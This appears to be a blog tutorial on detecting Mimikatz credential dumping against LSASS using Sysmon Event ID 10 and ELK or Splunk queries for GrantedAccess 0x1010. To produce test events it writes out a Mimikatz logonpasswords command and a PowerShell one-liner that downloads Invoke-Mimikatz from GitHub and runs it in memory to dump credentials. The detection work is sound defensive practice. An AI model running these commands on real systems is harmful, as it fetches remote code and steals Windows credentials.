How to Detect In-Memory | bin Mimikatz with Sysmon and ELK | SIEM
- What We Need:
- Sysmon Installed .
- logbeat | SIEM agent to forward logs to ELK (whatever SIEM ) .
- Invoke-Mimikatz ( from PowerShell Empire | PowerSploit )
- Mimikatz Binary ( MimiKatz.exe )
- Mimikatz briefly :
- Mimikatz is an open source tool originally developed by ethical hacker Benjamin Delpy, to demonstrate a flaw in Microsoft’s authentication protocols. Simply the tool obtaining Windows credential , and allows its users to extract authentication Info from the machine ,
- recently it's involved in many cyberattacks, including NotPetya, BadRabbit .
- "T1003" => Credential Dumping Technique
- LSASS briefly :
- The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. The stored credentials let users seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service.
- LSASS can store credentials in multiple forms, including:
- Reversibly encrypted plaintext
- Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
- NT hash
- LAN Manager (LM) hash
- Sysmon Event ID 10 : Process Access
According to Microsoft ,
The process accessed event reports when a process opens another process. This enables detection of hacking tools that read the memory contents of processes like Local Security Authority (Lsass.exe) to steal credentials .
also as mentioned in Microsoft ,
We Can see Mimikatz grants itself read and query permissions against LSASS .
| 0x1000 | Query Permissions Required to retrieve certain information about a process |
| 0x0010 | Read Permissions Required to read memory in a process |
=> The final result of combining both with an OR operation = 0x1010 .
- Artifacts we can see :
- Event ID 10: Sysmon Process Accessed
- Source Image: mimikatz.exe | Powershell.exe
- Target Image: lsass.exe
- GrantedAcces: 0x1010
- since there are numerous ways for executing Mimikatz,
- we focus on how it's accessing LSASS will be the better option (Access Rights).
- Now try to execute Mimikatz sekurlsa::logonpasswords from bin to retrieve credentials.
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
- Or Execute it in memory by typing the following commands:
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
- Moving to Sysmon Operational Logs we can find :
#Search Query to use :ELK :event_id:10 AND event_data.GrantedAccess: 0x1010Splunk :EventCode=10 GrantedAccess="0x1010" AND TargetImage="*lsass.exe"
- ELK Output:
Splunk Output:
- And here we go , you can trigger an Alert whenever This Event occurs.
- ConclusionBased on the above test , we can see how to detect In-memory Mimikatz , this is a good indicator to reduce the number of false positives when hunting it .
The Main point to detect the latest version of Mimikatz from a ProcessAccess perspective simply look at GrantedAccess: 0x1010 .
also , we will have part II to test & detect the Invoke-Mimikatz versions used in projects such as PowerSploit and PowerShell Empire.
- Useful Links & References :
- Sysmon Config: https://github.com/SwiftOnSecurity/Sysmon-config.git
- Mimikatz: https://github.com/gentilkiwi/mimikatz
Comments
Post a Comment